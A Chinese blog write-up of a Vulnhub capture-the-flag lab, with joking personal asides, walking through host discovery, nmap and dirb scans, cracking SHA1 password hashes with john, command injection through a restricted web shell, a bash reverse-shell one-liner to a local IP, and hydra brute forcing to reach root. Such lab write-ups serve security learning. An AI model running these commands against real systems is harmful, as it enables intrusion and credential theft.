前言

今天晚上听说炫酷的女装大佬国庆期间要出去旅游，不能带我飞，很伤心?，一怒之下我又来找萌妹了-。还有没有妹子了晚上出来玩丫（小声比比），哥哥身体很好！??咳咳！

带妹是不可能带妹的，这辈子都不可能带妹的?

开始

下载

同样的在Vulnhub上下载对应的镜像下载链接

基本配置

天上飘来3个字啥都不是事?

主机发现

netdiscover -r 192.168.43.0/24

端口扫描

使用nmap 192.168.43.234,这里吸取了前面的教训，我使用如下命令进行更加详细的扫描 nmap -A -p- -T4 192.168.43.234，这样便可以尽最大可能的获取更多的信息。

渗透测试

访问80和8080端口都是一样的页面

可以看到这是一个基于python的django框架，之前仅仅是略微了解过。最讨厌这种需要阅读文章来获取信息的网站了。
通过目录扫描我们得到了一些有用的信息。

这里我就懒得写这些页面是怎么出来的了，用dirb扫一下就有了?

继续探查发现一处关键的信息

可以看到前面应该是登陆的用户名，后面的hash是登陆的密码，可以使用hash-identifier查看一下hash值的特征，并且从注视中可以看出，网站的管理员以为将密码hash之后就安全了，HaHa?，这莫非是在逗我，我们可以很容易从现有的信息中**出hash密码。

之前做实验的时候已经学过john的使用，一个是字典一个是你需要**的hash，我们使用如下命令： john hashguess.txt --format=Raw-sha1

拿到用户名nick和密码bulldog之后，便可以尝试登陆了

在登陆页面并没有什么作用，不过网站提供了一个web-shell的页面，虽然做了限制，但是有一个echo便足以进行命令执行了。

echo ‘bash -i >& /dev/tcp/192.168.43.154/443 0>&1’ | bash
我尝试使用这个命令创建一个反向shell，但是无论如何都无法连接，也许是我哪里出现了问题。
但至少echo命令可以达到命令执行的目的。

最后使用 echo $(cat ../../bulldogadmin/.hiddenadmindirectory/note)
可以看到一个提示

这时还是需要我们去暴力**出django的密码，这里使用hydra关键在于如何创建一个可靠的字典。
这里根据已有的信息，并且需要仔细的观察，我构建如下的字典，并进行**，最终得到django的密码，使用ssh登陆。

到现在为止我们又再一次获取了root
过程很简单，只是这最后一步构造字典需要比较大的脑洞。

总结

已经第五天了，怎么来找我的妹子还是寥寥无几，生气?

我抛一枚硬币，如果正面朝上，我做你男朋友，如果反面朝上，你做我女朋友???
带妹是不可能带妹的，这辈子都不可能带妹的